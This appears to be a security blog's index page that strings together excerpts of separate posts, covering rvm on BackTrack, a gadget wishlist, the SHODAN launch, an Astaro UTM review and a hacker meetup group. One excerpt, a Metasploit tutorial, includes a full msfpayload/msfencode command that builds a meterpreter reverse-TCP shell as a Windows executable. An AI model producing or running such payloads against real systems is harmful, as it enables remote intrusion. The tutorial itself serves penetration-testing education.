UPDATE: if you don’t make some additional steps, the ‘rvm 1.9.1’ command only is active for the current console session. See the site for details: http://rvm.beginrescueend.com/ This short tutorial is how to get Ruby 1.9.1 on BT4 or any other Linux distro with the tool ‘rvm’ (Ruby Version Manager). The Metasploit team has put a lot of work into getting the framework to work well with 1.9.1 and still work with earlier versions.
What’s on your list? Here is mine (in no particular order): Number 1: iPhone compatible alarm clock with good sound Number 2: iPhone car mount that charges and is compatible with aux cables 32GB E-flash (esata, USB2.0) Drobo 4 bay backup solution The Tauntaun Sleeping Bag Griffin PowerMate Kindle DX or Barnes and Noble Nook Nokia N900 Roku HD-XR This Tesla or this one Canon EOS Rebel T1i Popcorn Hour Device (trumps the Roku) Logitech MX Revolution Logitech Harmony One The Art of Software Security Assessment by Mark Dowd Windows Internals 5 by Mark Russinovich and David Solomon Wi-Spy 2.
If you haven’t seen it all over twitter yet, achillean released the “beta” of SHODAN yesterday. It’s a search engine of basically a nmap of the internet (ports 21, 22, 23 or 80 so far). http://shodan.surtri.com/ You can search by keyword, and/or using any of the advanced search options. country: 2-letter country code hostname: full or partial host name net: IP range using CIDR notation (ex: 22.214.171.124/24 ) port: 21, 22, 23 or 80 Here is just a taste of the power this bring to the game:
Idea came thanks to cktricky from: http://cktricky.blogspot.com/ A bunch of sites on the web give you different pages depending on the browser you use to view it. I know when I was a web developer compatibility was the bane of my existence, as I’m sure it still is for all the web devs out there. Well, sometimes this leads to bad coding practices, or even the old “Google Bot gets to see everything” feature.
We (the security community) all know, and make fun of “Users”, and “Admins”. They are derogatory terms in our community. So much so, that they could almost be classified at curse words. (I can see the XKCD now: Security stick figure talking to IT stick figure. “You stupid A****“). While I neither discount their “contribution” to making my day fun, I feel that a lot of people miss an even bigger threat: Policies and Procedures, or SOP (Standard Operating Procedures).
Disclaimer: I was given a demo license of the new free business product to break/review. No money has traded hands. This is my brutally honest opinion of the product. I’ve played with a gambit of Astaro products, and personally I really hate UTMs, just like I do All-In-One Printer/Copier/Faxes. One thing breaks, they all do. However, Astaro’s .. before I go into my opinions of the product, or get on any soap box, here are the facts:
(This post got lost in the intertubes and it took a bit to get back, Archive.org nor Google cache had it) I get this question all the time: “Why room362.com?” I have answered that question in a lot of ways, depending on the perceived amount of time I had to tell the story. But, on a blog you have tons of time, right? Not if you are studying the Twitter boom.
In Revision 7315 of the Metasploit Framework (SVN) a new option was added to MSFENCODE. Technically you always had the ability to do the following, but it required a bit of knowledge of the inner workings of the framework. But before I get into the new feature, lets quickly go over the standard way you use msfencode: root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -o /tmp/bob.exe [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) root@bt4:/pentest/exploits/framework3# We just used MSFPAYLOAD to output in [R]AW format, a reverse tcp connect meterpreter payload.
Continuing my “Getting your fill of” series Dave Shackleford recently posted an excellent blog entry titled “One for the n00bs”: http://daveshackleford.com/?p=277 It relates the security community to a high school cafeteria. It’s a good read and pretty dead on. I want to echo his sentiments, “I got my OWN lunch table. And you’re invited.”, I”m just an email away. I also wanted to let you know there are a lot of places where you can learn on your own, at your own pace, and without any chance of ridicule.
I created a google group for the NoVA Hackers meetups (Formerly known as NoVASec Luncheons) I have added some permissions to the group to maximize privacy options while still allowing for interaction other than me sending out BCC’d messages to everyone: Private Invite Only - basically to keep spam out Only Managers can view Member List - so those who want don’t want their email addresses seen can join and just listen for announcements and regular message traffic